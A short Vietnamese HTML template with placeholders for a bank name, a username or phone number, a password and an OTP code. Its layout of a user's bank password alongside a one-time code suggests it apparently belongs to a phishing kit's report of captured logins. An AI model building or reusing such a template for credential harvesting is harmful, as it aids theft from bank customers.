<ul>
     <li>
        Tên ngân hàng: {{nameBank}}
    </li>
    <li>
        Tên đăng nhập/SĐT: {{username}}
    </li>
     <li>
        Mật khẩu: {{password}}
    </li>
    <li>
        {{otp ? 'Mã OTP: ' + otp : ''}}
    </li>
</ul>